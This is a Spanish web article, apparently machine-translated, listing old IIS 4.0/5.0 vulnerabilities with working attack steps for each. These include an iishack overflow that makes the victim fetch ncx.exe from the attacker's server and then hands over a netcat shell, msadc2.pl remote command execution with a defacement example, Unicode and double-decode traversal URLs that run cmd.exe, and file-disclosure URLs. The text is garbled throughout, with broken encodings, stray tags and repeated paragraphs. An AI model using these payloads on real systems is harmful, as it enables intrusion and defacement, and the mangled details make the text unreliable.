¿Cuáles son las vulnerabilidades comunes de la red?
Existe principalmente en archivos .htr, .idc y .stm. Las solicitudes de URL de estos archivos no realizan una verificación suficiente de los límites del nombre, lo que hace que el atacante inserte el programa de puerta trasera. Descargar y ejecutar programas en el sistema. Para detectar dichos sitios web, necesita dos archivos iishack.exe, ncx.exe (que se pueden encontrar en www.technotronic.com para descargar) y su propio servidor web. Ahora, puede ejecutar el programa de servicio de red en su propio servidor de red, colocar ncx.exe en su directorio correspondiente y luego usar iishack.exe para verificar la máquina de destino:
c:gt;iishack. exe lt;victimgt;80 lt;tu servidor webgt;/ncx.exe
Luego puedes usar netcat para conectarte al servidor que deseas probar:
c:gt;nc lt;victimgt ; 80
Si el punto de desbordamiento es correcto, puede ver la línea de comando de la computadora de destino y obtener altos derechos administrativos. La vulnerabilidad se puede encontrar en iis4hack.zip
2. msadc
Existe una vulnerabilidad en el componente MDAC de IIS que podría permitir a un atacante ejecutar comandos de forma remota en su sistema. El principal problema existe en RDS Datafactory, que de forma predeterminada permite enviar comandos remotos al servidor IIS, que se ejecuta como el usuario del dispositivo (generalmente el valor predeterminado es el usuario del SISTEMA). El programa de usuario es msadc2.pl, veamos su ayuda
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppies /ADM /wiretrip --
Cómo utilizar.
msadc.pl -h lt;hostgt; { -d lt;delaygt; -X -v }
-h lt;hostgt; = Host (IP o dominio) para escanear
-d lt;segundosgt; = Retraso entre llamadas, el valor predeterminado es 1 segundo
-X = Volcar tabla de rutas del servidor de índice (si existe)
-N = Consulta el nombre de VbBusObj NetBIOS
-V = Usar VbBusObj en lugar de ActiveDataFactory
-v = Redundante
-e = Archivo de diccionario externo del paso 5
-ult; \hostsharefilegt; = Usar archivos UNC
-w = Windows 95 en lugar de Windows NT
-c = compatibilidad v1 (consulta de tres pasos)
-s lt;numbergt; = ejecutar solo el paso lt;numbergt;
o -R restaurará la sesión del comando (v2)
[quack@chat quack] $ perl msadc2.pl -h /
-- RDS smack v2 - rain forest cachorro / ADM / wiretrip --
Escriba la línea de comando a ejecutar (se supone que es cmd /c):
cmd /c
Si escribe la línea de comando directamente después de que aparezca cmd /c, puede ejecutar el comando con privilegios del sistema. Por ejemplo, profesor xundi:
echo hackeado por mí gt; d: inetpubwwwrootvictimwebindex.htm
3.Codebrws.asp
Ver fuente del archivo
/iisamples/exair/ howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
4.Showcode.asp
Ver fuente del archivo
/msadc/samples/selector/showcode.asp?source=/msadc/.../.../.../.../.../.../.../. ./.../.../.../.../winnt/win.ini
5.Null.htw
Ver archivo fuente
/null.htw?CiWebhitsfile=/default.asp20amp;20CiRestriction=none20amp;20amp;CiHiliteType=full
Este es el archivo fuente del archivo. dll & .htw
La función de resaltado de resultados proporcionada por Index Server permite a los usuarios WEB resaltar sus términos de búsqueda originales en un documento cuyo nombre se pasa al archivo .htw a través de la variable CiWebhitsfile. Webhits.dll es una aplicación ISAPI que maneja solicitudes, abre archivos y devuelve resultados. Cuando los usuarios controlan el parámetro CiWebhitsfile pasado a .htw, pueden solicitar cualquier archivo, lo que permite ver el código fuente ASP y otros contenidos de archivos de script.
Para saber si tienes esta vulnerabilidad, puedes solicitar la siguiente entrada:
/nosuchfile.htw Si recibes el siguiente mensaje del servidor:
El formato QUERY_STRING no es válido, lo que significa que esta vulnerabilidad existe. El problema es principalmente que webhits.dll está asociado con una asignación de archivos .htw, por lo que puedes evitar esta vulnerabilidad eliminando
esta asignación, puedes buscar archivos .htw en el sistema que creas que es vulnerable , generalmente se encontrarán los siguientes programas:
/issasamples/issamples/oop/ qfullhit.htw
/issasamples/issamples/oop/qsumrhit.htw
/isssamples/exair /search/qfullhit.htw
/isssamples/exair/ search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (normalmente se utiliza para loopback)
Un atacante puede acceder al contenido de los archivos en el sistema a través de:
/issasamples/issamples/oop/oop/iirturnh.htw
/isssamples /issamples/oop/ oop/iirturnh.htw issamples/oop/qfullhit.htw?
ciwebhitsfile=/.../.../winnt/win.iniamp;cirestriction=noneamp;cihilitetype=full
En los sistemas donde existe la vulnerabilidad, aparecerá en el contenido del archivo win.ini. 7. Flujo de datos alternativo ASP (::$DATA) Para ver el contenido de algunos archivos .asp, puede solicitar la siguiente URL: /default.asp::$DATA y obtendrá el código fuente
8. Error de punto ASP
Agregar uno o más puntos al final de la URL solicitada puede provocar una fuga del código fuente ASP.
/sample.asp.
9.ISM.DLL
La vulnerabilidad fue descubierta por primera vez por el equipo de seguridad de la información de Cerberus. Se ejecuta en IIS 4.0 y 5.0 y permite a los atacantes ver el contenido de archivos arbitrarios y código fuente. Al acercarse a 230 o 20? (que representa espacios) y agregar ?.htr? a la solicitud especial a IIS, IIS piensa que el cliente está solicitando un archivo ?.htr? asignado a la aplicación ISAPI ISM.DLL para que IIS pase la solicitud .htr al archivo DLL. La solicitud htr se pasa al archivo DLL y luego el programa ISM.DLL abrirá y ejecutará el archivo pasado, pero antes de que ISM.DLL trunque la información, el búfer envía un .Htr truncado y tiene algo de tiempo para devolver el contenido del archivo. ismo. El búfer envía un .Htr truncado y tiene algo de tiempo para devolver el contenido del archivo a ISM.DLL antes de que ISM.DLL trunque la información. Este ataque solo se puede realizar una vez a menos que el servicio de red se haya detenido y reiniciado. Este ataque fallará si ya se ha enviado una solicitud .htr a la máquina. Sólo funciona cuando ISM.DLL se carga por primera vez en la memoria. CNNS descubrió que agregar el signo " " para evitar un solo ataque es problemático y permite múltiples ataques.
/global.asa2020(...lt;=230)global.asa.htr
Vulnerabilidad 10..idcamp;.ida
Esta vulnerabilidad es en realidad, es similar a la vulnerabilidad del punto ASP y se puede utilizar en IIS 4.
Esta vulnerabilidad es en realidad similar a la vulnerabilidad del punto ASP. Puede mostrar la información de su directorio WEB en IIS 4.0. se mostrará en IIS 5.0. También se han encontrado algunas de estas vulnerabilidades. Al agregar el sufijo ?idc? o ?ida?, IIS intentará permitir que .IDC se ejecute a través del programa de conexión de base de datos .DLL. existe, devolverá parte de la información al cliente.
/anything.idc o cualquier cosa.idq
11. Errores .htr
Las solicitudes que agregan URL .htr a algunos ASA y ASP pueden generar código fuente de archivo. fuga:
/global.asa .htr
12. Ejemplo de anuncio del servidor del sitio
/anything.idc o cualquier cosa.idq
11. Error .htr
Las solicitudes adjuntas a las URL .htr de algunos ASA y ASP pueden provocar una fuga del código fuente del archivo. Ejemplo de servidor de sitio
Al solicitar site.csc, que normalmente se almacena en /adsamples/config/site.csc, un atacante puede acceder a información como DSN, UID y PASS en la base de datos, por ejemplo:
/adsamples/ config/site.csc
13./iisadmpwd
IIS4.0 contiene una característica interesante que permite a usuarios remotos atacar cuentas de usuario en el servidor web. Es decir, su servidor web se traduce a una dirección a través de NAT y aún puede ser atacado. Cada instalación de IIS4.0 crea un directorio virtual /iisadmpwd, que contiene muchos archivos .htr, lo que permite a usuarios anónimos acceder a estos archivos que no están especificados solo en la dirección de bucle invertido (127.0.0.1), en la ventana emergente Al solicitar Estos archivos en el cuadro de diálogo, la cuenta del usuario y la contraseña se pueden cambiar a través de la WEB. Este directorio está asignado físicamente al siguiente directorio:
c:winntsystem32inetsrviisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
p>Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot .htr
p>
Anot3.htr
Este método permite a un atacante adivinar su contraseña por fuerza bruta.
14.Translate: f vulnerabilidad
Hay una fuga de código fuente de archivo asp en WebDAV en las extensiones OFFICE 2000 y FRONTPAGE 2000Server cuando alguien solicita ASP/ASA o cualquier otro script arbitrario. , Si agrega el sufijo Translate:f al HTTP GET y agrega / al final del archivo solicitado, se mostrará el código del archivo, siempre que, por supuesto, no se haya aplicado el parche WIN2K SP1.
Esta es una vulnerabilidad de W2K, pero como FP2000 también está instalado en IIS4.0, IIS4.0 también es vulnerable. Programas de explotación: trasn1.pl, trans2.pl
15.Unicode
IIS 4.0 e IIS 5.0 tienen vulnerabilidades de seguridad al realizar la decodificación de caracteres Unicode, lo que permite a los usuarios ejecutar de forma remota a través de IIS cualquier comando . Cuando IIS abre un archivo, si el nombre del archivo contiene caracteres Unicode, se decodifica, lo que puede provocar que IIS abra o ejecute incorrectamente archivos fuera del directorio raíz web si el usuario proporciona alguna codificación especial.
/scripts/...c11c.../winnt/system32/cmd.exe?/c dir
/scripts/...c0af...c0af... /winnt/system32/cmd.exe?/c dir
/scripts/...c19c...c19c.../winnt/system32/cmd.exe?/c dir
/a.asp/...c11c.../...c11c.../winnt/win.ini
Es posible que necesites consultar los siguientes directorios
OBTENER
p>/scripts/...c0af...c0af...c0af...c0af.../winnt/system32/cmd.exe?/c dir c:\
HTTP /1.0rnrn
OBTENER
/msadc/...c0af...c0af...c0af...c0af...c0af...c0af ...c0af ../winnt/system32/cmd.exe?/c dir c:\
HTTP/1.0rnrn
GET
/_vti_bin. /...c0af ...c0af...c0af.../winnt/system32/cmd.exe?/c dir c:\
HTTP/1.0rnrn
GET
/_mem_bin/...c0af...c0af...c0af.../winnt/system32/cmd.exe?/c dir c:\
HTTP/1.0 rnrn
OBTENER
/cgi-bin/...c0af...c0af...c0af.../winnt/system32/cmd.exe?/c dir c: \
HTTP/1.0rnrn
eeye desarrolló el kit de herramientas iishack1.5 para probar esta vulnerabilidad
16. Desbordamiento del buffer de iis5.0
Microsoft Win La interfaz de extensión ISAPI de impresión de 2K IIS
5 establece una asignación de la extensión .printer a msw3prt.dll, que existe de forma predeterminada. Cuando un usuario remoto envía una solicitud URL para una impresora, IIS
5 llama a msw3prt.dll para interpretar la solicitud.
Debido a que msw3prt.dll carece de una verificación adecuada de los límites del búfer, un usuario remoto puede enviar una solicitud URL .printer cuidadosamente construida donde el campo "Host:" contiene aproximadamente 420 bytes de datos, lo que genera un desbordamiento típico del almacenamiento en búfer en el área de msw3prt.dll, lo que potencialmente permite la ejecución. de código arbitrario. Después de que se produce el desbordamiento, el servicio WEB dejará de responder. Win 2K puede verificar si el servicio WEB deja de responder y reiniciarlo automáticamente, por lo que es difícil para el administrador del sistema darse cuenta de que se ha producido el ataque. Para conocer los exploits, consulte iis5hack.zip
17. Vulnerabilidad de decodificación secundaria del nombre de archivo CGI de IIS
IIS se decodifica dos veces al cargar un programa CGI ejecutable. La primera vez que el nombre del archivo CGI se decodifica como "etc." Una vez pasada la verificación del nombre del archivo, IIS lo decodificará por segunda vez. Normalmente, sólo se deben decodificar los parámetros de CGI, pero IIS decodifica por error el nombre del archivo CGI decodificado junto con los parámetros CGI. Por lo tanto, el nombre del archivo CGI se decodifica incorrectamente dos veces.
Al construir cuidadosamente un nombre de archivo CGI, un atacante puede eludir las comprobaciones de seguridad de IIS en los nombres de archivos, como las comprobaciones ". /" o "./", y, bajo ciertas condiciones, el atacante puede ejecutar cualquier sistema. dominio.
Por ejemplo, para el carácter '', la codificación normal es 5c. Las codificaciones correspondientes de estos tres caracteres son:
'' = 25
'5 ' = 35
'c' = 63
Para volver a codificar estos tres caracteres, existen varias formas, como por ejemplo:
255c
35c
3563
253563
...
Por lo tanto, "..." se puede representar como "... 255c" o "... 35c", y así sucesivamente. Después de decodificarlo por primera vez, se convierte en "...5c". IIS considerará esto como una cadena normal y no violará los controles de seguridad. Después de decodificarlo por segunda vez, se convierte en "...". Por lo tanto, un atacante puede utilizar "..." para recorrer directorios y ejecutar programas arbitrarios fuera del directorio de red. Bien, eso es todo. . . . . Hay tantas lagunas, pero Microsoft sigue siendo el primero, tiene una amplia gama de usuarios y el segundo, XXX jajaja.